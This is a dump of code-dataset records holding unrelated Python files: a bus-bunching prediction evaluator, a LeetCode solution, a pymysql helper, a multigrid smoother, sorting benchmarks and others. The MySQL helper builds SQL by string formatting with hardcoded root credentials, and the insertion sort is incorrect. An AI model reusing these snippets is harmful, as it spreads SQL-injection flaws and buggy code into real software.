True\r\n\r\n\t\t\t\t\t\t\t#print(bcolors.OKGREEN+'{0:13.0f}\\t{1}\\t{2:4.0f}\\t{3:4.0f}\\t{4}\\t{5}'.format(dataset[i].id,j+1+secuencia,headwayReal,headwayReal,bunchingReal,bunchingReal)+bcolors.ENDC)\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif j == 0:\r\n\t\t\t\t\t\t\t\tdataset[i].predicciones = numpy.array([headwayReal])\r\n\t\t\t\t\t\t\t\t# dataset[i].predicciones = prediccionesTemp[0]*600+dataset[i].x[0][j+secuencia][3]*3600\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tdataset[i].predicciones = numpy.append(dataset[i].predicciones,[headwayReal],axis=0)\r\n\t\t\t\t\t\t\t\t# dataset[i].predicciones = numpy.append(dataset[i].predicciones,prediccionesTemp[0]*600+dataset[i].x[0][j+secuencia][3]*3600,axis=0)\r\n\r\n\t\t\t\t\t\t\tif (j+secuencia) == dataset[i].limiteVentana:\r\n\t\t\t\t\t\t\t\t# Debe generar secuencia siguiente\r\n\t\t\t\t\t\t\t\tultimaSecuencia = numpy.array( dataset[i].x[:,j+1:j+secuencia+1,3:4] )\r\n\t\t\t\t\t\t\t\t# ultimaSecuencia = numpy.append(ultimaSecuencia,[prediccionesTemp],axis=1)\r\n\t\t\t\t\t\t\t\t#print(ultimaSecuencia)\r\n\r\n\t\t\t\t\t\t# En caso se tener que utilizar predicciones anteriores para generar las restantes\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tentrada_metadatos = numpy.array( [[ j+1+secuencia, dataset[i].x[0][0][1],dataset[i].x[0][0][2] ]] )\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t#print(entrada_metadatos)\r\n\r\n\t\t\t\t\t\t\tentrada_recurrente = ultimaSecuencia\r\n\r\n\t\t\t\t\t\t\tsalida_secuencia = numpy.array( [ dataset[i].y[j+secuencia] ] )\r\n\r\n\t\t\t\t\t\t\tsiguientePrediccion = modelo.predict([entrada_metadatos,entrada_recurrente], batch_size = 1, verbose = 0)\r\n\r\n\t\t\t\t\t\t\tprediccion = siguientePrediccion[0][0]*600\r\n\t\t\t\t\t\t\theadwayPrediccion = siguientePrediccion[0][0]*600+dataset[i].predicciones[len(dataset[i].predicciones)-1]\r\n\t\t\t\t\t\t\theadwayReal = salida_secuencia[0][0]+dataset[i].x[0][j+secuencia][3]*3600\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t#Revisa si hay bunching o no\r\n\t\t\t\t\t\t\tif abs(headwayPrediccion) < 0.25*headwayInicial:\r\n\t\t\t\t\t\t\t\tbunchingPrediccion = True\r\n\t\t\t\t\t\t\t\ttempPrecisionPrediccion = 1\r\n\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif abs(headwayReal) < 0.25*headwayInicial:\r\n\t\t\t\t\t\t\t\tbunchingReal = True\r\n\t\t\t\t\t\t\t\ttempPrecisionReal = 1\r\n\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif bunchingReal == bunchingPrediccion:\r\n\t\t\t\t\t\t\t\ttempPrecisionDetalle = tempPrecisionDetalle + 1\r\n\r\n\t\t\t\t\t\t\tif bunchingReal== True and bunchingReal == bunchingPrediccion:\r\n\t\t\t\t\t\t\t\ttempSensibilidad = tempSensibilidad + 1\r\n\t\t\t\t\t\t\t\tcantBunching = cantBunching + 1\r\n\r\n\r\n\t\t\t\t\t\t\tif bunchingReal== False and bunchingReal == bunchingPrediccion:\r\n\t\t\t\t\t\t\t\ttempEspecificidad = tempEspecificidad + 1\r\n\t\t\t\t\t\t\t\tcantNoBunching = cantNoBunching + 1\r\n\r\n\t\t\t\t\t\t\tf2.write('{0:4.8f}\\t{1:4.8f}\\t{2}\\t{3}\\n'.format(round(abs(headwayPrediccion))/headwayInicial,abs(headwayReal)/headwayInicial,bunchingPrediccion*1,bunchingReal*1))\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tdataset[i].predicciones = numpy.append(dataset[i].predicciones,[headwayPrediccion],axis=0)\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif j < (len(dataset[i].x[0]) - 1):\r\n\t\t\t\t\t\t\t\tultimaSecuencia = numpy.array([ultimaSecuencia[0][1:secuencia]])\r\n\t\t\t\t\t\t\t\tultimaSecuencia = numpy.append(ultimaSecuencia,[siguientePrediccion],axis=1)\r\n\t\t\t\t\t\t\t\t#print(ultimaSecuencia)\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Despues de recorrer el viaje completo calcula las precisiones\r\n\t\t\t\t\tprecisionDetalle = precisionDetalle + float(tempPrecisionDetalle)/float((len(dataset[i].x[0]))-dataset[i].limiteVentana-1)\r\n\t\t\t\t\tif cantBunching > 0:\r\n\t\t\t\t\t\tsensibilidad = sensibilidad + float(tempSensibilidad)/float(cantBunching)\r\n\t\t\t\t\tif cantNoBunching > 0:\r\n\t\t\t\t\t\tespecificidad = especificidad + float(tempEspecificidad)/float(cantNoBunching)\r\n\r\n\t\t\t\t\taciertoBinario = 0\r\n\t\t\t\t\tif tempPrecisionReal == tempPrecisionPrediccion:\r\n\t\t\t\t\t\tprecisionBinaria = precisionBinaria + 1\r\n\t\t\t\t\t\taciertoBinario = 1 \r\n\r\n\t\t\t\t\t# print(\"\\nPar {}\\nAcierto existencia de bunching: {}\\nAciertos binarios acumulados: {}\\nParaderos acertados: {}\\nPrecision paraderos: {}\\nPrecisionAcumulada: {}\\n\".format(dataset[i].id,aciertoBinario,precisionBinaria,tempPrecisionDetalle,float(tempPrecisionDetalle)/float((len(dataset[i].x[0]))-dataset[i].limiteVentana-1),precisionDetalle))\r\n\r\n\t\t\tif cantidadParesViajes > 0:\r\n\t\t\t\tsensibilidad = float(sensibilidad)/float(cantidadParesViajes)\r\n\t\t\t\tespecificidad = float(especificidad)/float(cantidadParesViajes)\r\n\t\t\t\tprecisionDetalle = float(precisionDetalle)/float(cantidadParesViajes)\r\n\t\t\t\tprecisionBinaria = precisionBinaria/cantidadParesViajes\r\n\r\n\t\t\t\tprint(bcolors.OKBLUE+\"\\nPrecisionBinaria: {0:3.4f}\\tPrecisionDetalle: {1:3.4f}\\tSensibilidad: {2:3.4f}\\tEspecificidad: {3:3.4f}\\n\".format(precisionBinaria*100, precisionDetalle*100,sensibilidad*100,especificidad*100)+bcolors.ENDC)\r\n\t\t\t\tf.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(dia,finVentana,cantidadParesViajes,precisionBinaria,precisionDetalle,sensibilidad,especificidad))\r\n\r\n\t\t\t\tfor p in range(len(precisionesBinarias)):\r\n\t\t\t\t\tif precisionesBinarias[p] == 0.0:\r\n\t\t\t\t\t\tprecisionesBinarias[p] = precisionBinaria\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\t\tfor p in range(len(precisionesDetalle)):\r\n\t\t\t\t\tif precisionesDetalle[p] == 0.0:\r\n\t\t\t\t\t\tprecisionesDetalle[p] = precisionDetalle\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\t\tfor p in range(len(sensibilidades)):\r\n\t\t\t\t\tif sensibilidades[p] == 0.0:\r\n\t\t\t\t\t\tsensibilidades[p] = sensibilidad\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\t\tfor p in range(len(especificidades)):\r\n\t\t\t\t\tif especificidades[p] == 0.0:\r\n\t\t\t\t\t\tespecificidades[p] = especificidad\r\n\t\t\t\t\t\tbreak\r\n\r\n\r\npromedioPrecisionBinaria = 0.0\r\ncontador = 0.0\r\nfor i in range(len(precisionesBinarias)):\r\n\tif precisionesBinarias[i] != 0:\r\n\t\tcontador = contador + 1\r\n\t\tpromedioPrecisionBinaria = promedioPrecisionBinaria + precisionesBinarias[i]\r\n\r\npromedioPrecisionBinaria = promedioPrecisionBinaria / contador\r\n\r\npromedioPrecisionDetalle = 0.0\r\ncontador = 0.0\r\nfor i in range(len(precisionesDetalle)):\r\n\tif precisionesDetalle[i] != 0:\r\n\t\tcontador = contador + 1\r\n\t\tpromedioPrecisionDetalle = promedioPrecisionDetalle + precisionesDetalle[i]\r\n\r\npromedioPrecisionDetalle = promedioPrecisionDetalle / contador\r\n\r\n\r\npromedioSensibilidad = 0.0\r\ncontador = 0.0\r\nfor i in range(len(sensibilidades)):\r\n\tif sensibilidades[i] != 0:\r\n\t\tcontador = contador + 1\r\n\t\tpromedioSensibilidad = promedioSensibilidad + sensibilidades[i]\r\n\r\npromedioSensibilidad = promedioSensibilidad / contador\r\n\r\n\r\npromedioEspecificidad = 0.0\r\ncontador = 0.0\r\nfor i in range(len(especificidades)):\r\n\tif especificidades[i] != 0:\r\n\t\tcontador = contador + 1\r\n\t\tpromedioEspecificidad = promedioEspecificidad + especificidades[i]\r\n\r\npromedioEspecificidad = promedioEspecificidad / contador\r\n\r\nprint(bcolors.FAIL+\"\\nPrecision Binaria: {}\\tPrecision Detalle: {}\\n\".format(promedioPrecisionBinaria,promedioPrecisionDetalle,promedioSensibilidad,promedioEspecificidad)+bcolors.ENDC)\r\nf.write(\"Promedio\\t\\t\\t{}\\t{}\\t{}\\t{}\\n\".format(promedioPrecisionBinaria,promedioPrecisionDetalle,promedioSensibilidad,promedioEspecificidad))\r\nf.close()\r\nf2.close()","sub_path":"codigo/prediccionBunching/prediccionRNH-Completo.py","file_name":"prediccionRNH-Completo.py","file_ext":"py","file_size_in_byte":15687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"612932864","text":"class Solution(object):\n def numDistinct(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: int\n \"\"\"\n n1 = len(s)\n n2 = len(t)\n # dp[i][j]代表字符串t前j个字符串可以由字符串s前i个字符串组成最多个数.\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n # 当t为空的时候,显然对于任意字符串s结果都为1\n for i in range(n1 + 1):\n dp[i][0] = 1\n # 这个可以不用再重新赋值了\n # for j in range(n2 + 1):\n # dp[0][j] = 0\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n # 当s当前字符和t当前字符相同的时候\n # s的最后一个字符肯定参与,t的最后一个字符可以参与也可以不参与,两种可能\n # dp[i-1][j-1]:t最后一个参与\n # dp[i-1][j]:t最后一个字符不参与\n if s[i - 1] == t[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + dp[i - 1][j]\n # 如果s和t的当前字符不相同,那么显然t最后一个字符不参与\n else:\n dp[i][j] = dp[i - 1][j]\n return dp[-1][-1]\n","sub_path":"题目分类/动态规划/distinct_subsequences_115.py","file_name":"distinct_subsequences_115.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"308321368","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport pymysql\nimport getDBInfo\nimport time\nimport kaoyanSpider\n\n\nclass MySQLWrapper(object):\n \"\"\"\n 数据库操作的封装.\n \"\"\"\n def __init__(self, command='', *args, **kwargs):\n if command != '':\n conn = self.get_conn()\n try:\n cursor = conn.cursor()\n cursor.execute(command)\n except Exception:\n print('SQL execute error')\n conn.conn_close(conn)\n\n def get_conn(self):\n conn = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanboa\")\n return conn\n\n def conn_close(self, conn=None):\n conn.close()\n\n # def execute(self, command, method_flag=0, conn=None):\n # cursor = conn.cursor()\n # # noinspection PyBroadException\n # try:\n # if not method_flag:\n # cursor.execute(command)\n # else:\n # cursor.execute(command[0], command[1])\n # conn.commit()\n # except Exception:\n # print('sql execute error!')\n # return 0\n\n\ndef get_school_key(name):\n command = \"select id from school where name = '{}'\".format(name)\n db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n cursor = db.cursor()\n try:\n cursor.execute(command)\n sid = cursor.fetchone()[0]\n except:\n db.rollback()\n db.close()\n return sid\n\n\ndef do_school_insert(name, link):\n command = gen_school_insert_command(getDBInfo.get_school_info_dict(name, link))\n db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n cursor = db.cursor()\n print(name, \"->\")\n try:\n cursor.execute(command)\n db.commit()\n except Exception:\n db.rollback()\n db.close()\n print(name, \"成功插入\")\n\n\ndef insert_site_to_school(logo_dict):\n logo_list = [logo_dict['school_name'], logo_dict['logo_link']]\n db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n cursor = db.cursor()\n command = u\"UPDATE SCHOOL SET imgsrc = '{0[1]}' WHERE name = '{0[0]}'\".format(logo_list)\n print(command)\n try:\n cursor.execute(command)\n db.commit()\n except Exception:\n db.rollback()\n db.close()\n print(logo_list)\n\n\ndef do_comm_insert():\n a = 1\n for k, v in kaoyanSpider.get_comm().items():\n db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n cursor = db.cursor()\n comm_dict = {'title': k, 'content': v}\n command = gen_comm_insert_command(comm_dict)\n print('第{}条->'.format(a))\n try:\n cursor.execute(command)\n db.commit()\n except Exception:\n db.rollback()\n db.close()\n print('-------------------accomplish-------------------------')\n a += 1\n\n\ndef do_content_insert(command):\n db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n cursor = db.cursor()\n try:\n cursor.execute(command)\n db.commit()\n except Exception:\n db.rollback()\n db.close()\n\n\ndef gen_comm_insert_command(info_dict):\n info_list = ['title', 'content']\n t = []\n for il in info_list:\n if il in info_dict:\n t.append(info_dict[il])\n else:\n t.append('')\n create_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n t.append(create_time)\n command = (u\"INSERT INTO COMM(title, content, create_time, levels, u_id) VALUES \"\n u\"('{0[0]}', '{0[1]}', '{0[2]}', 2, 1)\".format(t))\n return command\n\n\ndef gen_school_insert_command(info_dict):\n \"\"\"Generate insert sql for school.\n\n :param info_dict: dict contains with school's information\n :return: command\n :rtype: str\n \"\"\"\n info_list = ['name', 'intro', 'district', 'site']\n t = []\n for il in info_list:\n if il in info_dict:\n t.append(info_dict[il])\n else:\n t.append('')\n command = (u\"INSERT INTO SCHOOL(name, intro, district, site) VALUES \"\n u\"('{0[0]}', '{0[1]}', '{0[2]}', '{0[3]}')\".format(t))\n return command\n\n\ndef gen_content_insert_command(info_dict):\n info_list = ['title', 'content']\n t = [info_dict['sheet_name']]\n for il in info_list:\n if il in info_dict:\n t.append(info_dict[il])\n else:\n t.append('')\n t.append(get_school_key(info_dict['school_name']))\n command = (u\"INSERT INTO {0[0]}(title, content, sId) VALUES \"\n u\"('{0[1]}', '{0[2]}', {0[3]})\".format(t))\n return command\n\n\n\n\n\n","sub_path":"mysqlWrapper.py","file_name":"mysqlWrapper.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"271995652","text":"import numpy as np\r\nimport cvxpy as cp\r\n\r\nfrom indexingFunctions import *\r\n\r\ndef distributionConstraints(n, x):\r\n constr = []\r\n constr += [x >= 0]\r\n constr += [cp.sum(x[allIndex(n)]) == 1]\r\n constr += [cp.sum(x[marginal_1(n, 0)]) == 0]\r\n\r\n return constr\r\n\r\ndef distributionConstraintsDual(dconstr):\r\n d = []\r\n for i in range(len(dconstr)):\r\n d += [dconstr[i].dual_value]\r\n\r\n return d\r\n\r\ndef checkDistributionConstraints(n, x, y, z, acc, verbose=True):\r\n constr = True\r\n constr = constr and (y >= -acc).all()\r\n constr = constr and (np.abs(np.sum(x) - 1) <= acc)\r\n constr = constr and (np.abs(np.sum(y) - 1) <= acc)\r\n constr = constr and (np.abs(np.sum(z) - 1) <= acc)\r\n constr = constr and (np.abs(z[0]) <= acc)\r\n\r\n if verbose:\r\n print(\"sum x : \", np.sum(x))\r\n print(\"sum y : \", np.sum(y))\r\n print(\"sum z : \", np.sum(z))\r\n print(\"########## value of x ##########\")\r\n print(x)\r\n print(\"========== value of y ==========\")\r\n print(y)\r\n print(\"---------- value of z ----------\")\r\n print(z)\r\n\r\n return constr\r\n","sub_path":"source/distributionConstraints.py","file_name":"distributionConstraints.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"643594384","text":"from random import random\nN = 128\narray = []\nfor i in range(N):\n array.append(int(random()*100))\narray.sort()\nprint(array)\n\nnumber = int(input())\n\nlow = 0\nhigh = N-1\ncount = 0\n\nwhile low <= high:\n count += 1\n\n mid = (low + high) // 2\n if number < array[mid]:\n high = mid - 1\n elif number > array[mid]:\n low = mid + 1\n else:\n print(\"ID =\", mid + 1, count)\n break\nelse:\n print(\"No the number\", count)\n","sub_path":"venv/Include/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"364835757","text":"from __future__ import print_function\nfrom hpgmg.finite_volume.operators.base_operator import BaseOperator\nfrom hpgmg.finite_volume.operators.smoother import Smoother\n\n__author__ = 'Shiv Sundram shivsundram@berkeley.edu U.C. Berkeley, shivsundram@lbl.gov, LBNL'\n\n# Based on Yousef Saad's Iterative Methods for Sparse Linear Algebra, Algorithm 12.1, page 399\n# with algorithmic corrections provided by Sam Williams\n\n\nclass ChebyshevSmoother(Smoother):\n def __init__(self, op, degree=4, iterations=10):\n \"\"\"\n :param op:\n :param degree:\n :param iterations:\n :return:\n \"\"\"\n assert isinstance(op, BaseOperator)\n assert isinstance(degree, int)\n assert isinstance(iterations, int)\n\n self.operator = op\n self.iterations = iterations\n self.degree = degree\n\n\n def smooth(self, level, mesh_to_smooth, rhs_mesh):\n \"\"\"\n\n :param level: the level being smoothed\n :param mesh_to_smooth:\n :param rhs_mesh:\n :return:\n \"\"\"\n beta = 1.000*level.dominant_eigen_value_of_d_inv_a\n alpha = 0.125000*beta\n theta = 0.5*(beta+alpha)\t\t# center of the spectral ellipse\n delta = 0.5*(beta-alpha)\t\t# major axis?\n sigma = theta/delta\n rho_n = 1/sigma\t\t\t# rho_0\n chebyshev_c1 = [float] * self.degree # + c1*(x_n-x_nm1) == rho_n*rho_nm1\n chebyshev_c2 = [float] * self.degree # + c2*(b-a_x_n)\n chebyshev_c1[0] = 0.0\n chebyshev_c2[0] = 1/theta\n for s in range(1, self.degree): # generate chebyshev polynomial coefficients\n rho_nm1 = rho_n\n rho_n = 1.0/(2.0*sigma - rho_nm1)\n chebyshev_c1[s] = rho_n*rho_nm1\n chebyshev_c2[s] = rho_n*2.0/delta\n\n self.operator.set_scale(level.h)\n\n need_copy = False\n for s in range(self.degree*self.iterations): # need to store 2 prev src meshes\n if (s & 1) == 0:\n working_source = mesh_to_smooth\n working_source_prev = level.temp\n working_target = level.temp\n else:\n working_source = level.temp\n working_source_prev = mesh_to_smooth\n working_target = mesh_to_smooth\n\n c1 = chebyshev_c1[s % self.degree]\n c2 = chebyshev_c2[s % self.degree]\n\n lambda_mesh = level.d_inverse\n\n level.solver.boundary_updater.apply(level, working_source)\n for index in level.interior_points():\n a_x = self.operator.apply_op(working_source, index, level)\n b = rhs_mesh[index]\n working_target[index] = working_source[index] + (\n c1 * (working_source[index] - working_source_prev[index]) +\n c2 * lambda_mesh[index] * (b - a_x)\n )\n need_copy = not need_copy\n\n if need_copy:\n level.copy_mesh(mesh_to_smooth, level.temp)\n","sub_path":"hpgmg/finite_volume/operators/chebyshev_smoother.py","file_name":"chebyshev_smoother.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"397438494","text":"\nfrom Sire.Tools import WSRC\nfrom Sire.IO import *\nfrom Sire.Maths import *\nfrom Sire.Mol import *\n\nimport Sire.Stream\n\n(waters, space) = Amber().readCrdTop(\"../io/waterbox.crd\", \"../io/waterbox.top\")\n\nprint(space.dimensions())\n\nligand = Sire.Stream.load(\"../io/ligand.s3\")\nligand = ligand.move().translate( -ligand.evaluate().center() ).commit()\nligand = ligand.move().translate( 0.5 * space.dimensions() ).commit()\n\noverlaps = WSRC.getOverlapWaters(ligand, waters)\n\nprint(overlaps)\n\nswap = MoleculeGroup(\"swap\")\n\nfor overlap in overlaps:\n swap.add( overlap.molecule() )\n\nPDB().write(ligand, \"ligand.pdb\")\nPDB().write(swap, \"waters.pdb\")\n\nif __name__ == \"__main__\":\n print(\"OK\")\n","sub_path":"python/tests/Tools/test_idpoints.py","file_name":"test_idpoints.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"333156842","text":"# a tuple is similar to a list but their values cannot be changed \n# keword arguements are arguements that are already defined \n\ndef get_age():\n print(\"How old are you ?\") \n try:\n age = int(input())\n return age \n except ValueError:\n return \"That was not valid input\" \nget_age() ","sub_path":".history/module_test1_20200420162004.py","file_name":"module_test1_20200420162004.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"650702146","text":"from tools import GridDefinition\nfrom PyQt4 import QtCore\n\ndefault_setting = {\n \"location_dir\" : \"\",\n \"docking_program\" : None,\n \"project_name\": \"Docking_Project\",\n \"pH\": 7.4,\n \"protein_name\": \"protein\",\n \"ligand_name\": \"ligand\",\n \"ligands\": None,\n \"metals\": None,\n \"selected_ligand\": None,\n \"grid_def\": 'auto',\n \"rmsd_tolerance\": 2,\n \"energy_range\": 3,\n \"cpu\": 1,\n \"exhaustiveness\": \"auto\",\n \"poses_vina\": 10,\n \"total_poses\": 500,\n \"protein_file\": \"\",\n \"ligand_file\": \"\",\n \"working_dir\": \"\",\n \"input_dir\": 'input',\n \"result_dir\": 'results'\n}\n\n\ndef values(self, k): # ok\n if k.objectName() == 'horizontalSlider':\n self.parent.cpu = self.horizontalSlider.value()\n self.cpu_label.setText(\"%s\" % self.parent.cpu + \" CPU in use of %s\" % self.number_cpu)\n elif k.objectName() == 'pH_value':\n self.parent.pH = self.pH_value.value()\n elif k.objectName() == 'nposes_value':\n self.parent.poses_vina = self.nposes_value.value()\n elif k.objectName() == \"exh_value\":\n self.parent.exhaustiveness = self.exh_value.value()\n\ndef check_res(self):\n try:\n self.check = GridDefinition(self.parent.input_protein, self.grid_predef_text.text())\n error = self.check.check_select()\n except: error = 1\n if error == 0:\n self.checker_icon_ok.show()\n self.checker_icon.hide()\n self.run_button.setEnabled(True)\n else:\n self.checker_icon.show()\n self.checker_icon_ok.hide()\n self.run_button.setEnabled(False)\n\n\n\ndef progress(self, form, phase, value=None, finish=False, reverse=False, time=0, mess=''):\n if phase == 0:\n stage = 'Initial Configuration: '\n elif phase == 1:\n stage = 'Prepare Input Files: '\n elif phase == 2:\n stage = 'Binding Site Definition: '\n else:\n stage = 'Molecular Docking Simulation: '\n timems = time*1000\n if form == 0:\n if reverse:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess)\n else:\n if finish:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage+mess+'Done.')\n else:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess)\n\n elif form == 1:\n if reverse:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess)\n else:\n if finish:\n self.timeline.stop()\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess+'Done.')\n\n else:\n self.previous_value = self.progressBar.value()\n self.timeline = QtCore.QTimeLine(timems)\n self.timeline.setFrameRange(0, (value - self.previous_value)-1)\n self.timeline.frameChanged.connect(lambda i: self.progressBar.setValue(self.previous_value + i))\n self.timeline.start()\n # self.progressBar_label.setText(stage+mess)\n elif form == 3:\n if reverse:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess)\n else:\n if finish:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess + 'Done.')\n else:\n self.progressBar.setValue(value[0] + value[1])\n # self.progressBar_label.setText(stage + mess)\n\n","sub_path":"Lib/site-packages/AMDock/some_slots.py","file_name":"some_slots.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"532968971","text":"#https://stackabuse.com/sorting-algorithms-in-python/\n\nimport time\nimport random\n\ndef bubbleSort(num_list):\n\tfor i in range(len(num_list)):\n\t\tfor j in range(len(num_list) - 1):\n\t\t\tif num_list[j] > num_list[j + 1]:\n\t\t\t\tnum_list[j], num_list[j + 1] = num_list[j + 1], num_list[j]\n\n\treturn num_list\n\ndef selectionSort(num_list):\n\tfor i in range(len(num_list)):\n\t\tlowestValueIndex = i\n\t\tfor j in range(i + 1, len(num_list)):\n\t\t\tif num_list[j] < num_list[lowestValueIndex]:\n\t\t\t\tlowestValueIndex = j\n\t\tnum_list[i], num_list[lowestValueIndex] = num_list[lowestValueIndex], num_list[i]\n\n\treturn num_list\n\ndef insertionSort(num_list):\n\tfor i in range(1, len(num_list)):\n\t\tj = i - 1\n\t\twhile j >= 0 and num_list[j] > num_list[i]:\n\t\t\tnum_list[i] = num_list[j]\n\t\t\tj -= 1\n\t\tnum_list[j + 1] = num_list[i]\n\n\treturn num_list\n\ndef quickSortPartition(num_list, low, high):\n\tpivotPoint = num_list[(low + high) // 2]\n\ti = low - 1\n\tj = high + 1\n\twhile True:\n\t\ti += 1\n\t\twhile num_list[i] < pivotPoint:\n\t\t\ti += 1\n\n\t\tj -= 1\n\t\twhile num_list[j] > pivotPoint:\n\t\t\tj -= 1\n\n\t\tif i >= j:\n\t\t\treturn j\n\n\t\tnum_list[i], num_list[j] = num_list[j], num_list[i]\n\ndef quickSort(num_list):\n\tdef _quickSort(items_list, low, high):\n\t\tif low < high:\n\t\t\tsplitIndex = quickSortPartition(items_list, low, high)\n\t\t\t_quickSort(items_list, low, splitIndex)\n\t\t\t_quickSort(items_list, splitIndex + 1, high)\n\t\n\t_quickSort(num_list, 0, len(num_list) - 1)\n\n\treturn num_list\n\ndef calcTime(func, args):\n\tstartTime = time.perf_counter()\n\tfunc(args)\n\tactualEndTime = time.perf_counter() - startTime\n\tformatEndTime = '{:.15f}'.format(float(actualEndTime))\n\n\treturn formatEndTime, actualEndTime\n\nif __name__ == '__main__':\n\trandomNumList = [random.randint(0, 10000) for iter in range(100000)]\n\n\tbubbleSortTime, actualBubbleSortTime = calcTime(bubbleSort, randomNumList)\n\tselectionSortTime, actualSelectionSortTime = calcTime(selectionSort, randomNumList)\n\tinsertionSortTime, actualInsertionSortTime = calcTime(insertionSort, randomNumList)\n\tquickSortTime, actualQuickSortTime = calcTime(quickSort, randomNumList)\n\n\tprint(f'Time for bubble sort: {bubbleSortTime}s')\n\tprint(f'Time for selection sort: {selectionSortTime}s')\n\tprint(f'Time for insertion sort: {insertionSortTime}s')\n\tprint(f'Time for quick sort: {quickSortTime}s')\n\t","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"557025417","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict\nfrom math import ceil\n\nimport sys\n\nmaterial = defaultdict(list) # [amount, (input, amount)]\n\n\ndef parse_amount_and_name(element):\n amount, name = element.split()\n return (int(amount), name)\n\n\ndef parse_input(filename):\n with open(filename) as fin:\n for line in fin:\n inputs, output = line.strip(\"\\n\").split(\"=>\")\n out_amount, out_name = parse_amount_and_name(output)\n material[out_name].append(out_amount)\n for input_element in inputs.split(\", \"):\n in_amount, in_name = parse_amount_and_name(input_element)\n material[out_name].append((in_name, in_amount))\n\n\ndef analyze(target=\"FUEL\", raw=\"ORE\", amount=1):\n needed = defaultdict(int)\n needed[target] = amount\n left = defaultdict(int)\n while True:\n size = len(needed)\n if size == 1 and raw in needed:\n break\n keys = list(needed.keys())\n for current in keys:\n if current == raw:\n continue\n units = needed.pop(current)\n if current not in material: # 'ORE'\n continue\n multiple = ceil((units - left[current]) / material[current][0])\n left[current] = multiple * material[current][0] - units\n for (input_element, input_amount) in material[current][1:]:\n needed[input_element] += multiple * input_amount - left[input_element]\n left[input_element] = 0\n return needed[raw]\n\n\ndef binary_search():\n low = 0\n high = 1000000000000\n limit = 1000000000000\n while low < high:\n mid = (low + high) // 2\n need = analyze(amount=mid)\n if need > limit:\n high = mid - 1\n elif need < limit:\n low = mid + 1\n else:\n return mid\n return low - 1\n\n\nparse_input(sys.argv[1])\nore_for_1_fuel = analyze()\nprint(f\"1 unit of FUEL needs {ore_for_1_fuel} units of ORE\")\nmaximum = binary_search()\nprint(\n f\"Given 1 trillion ORE, {maximum} amount of FUEL can be produced, \"\n f\"costing {analyze(amount=maximum)} units of ORE\"\n)\n","sub_path":"14/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498537636","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Jobs holds jobs (metronome) methods called elsewhere in quarrier,\n particularly from cli.py\n\"\"\"\nimport copy\n\nfrom dcos import emitting, util\nfrom dcos.errors import DCOSException, DCOSHTTPException\n\nfrom quarrier import common, constants\n\nlogger = util.get_logger(__name__)\nutil.configure_process_from_environ()\n\nemitter = emitting.FlatEmitter()\n\n\ndef clean_json_for_job_post_put(job_json, remove_schedules_key=False):\n '''\n Checks that a metronome job json complies with defined keys in JOB_JSON_DEF_ALLOWED_KEYS\n It checks the given json, and keys that are not in the list are removed\n :param job_json: the object representation of a metronome job 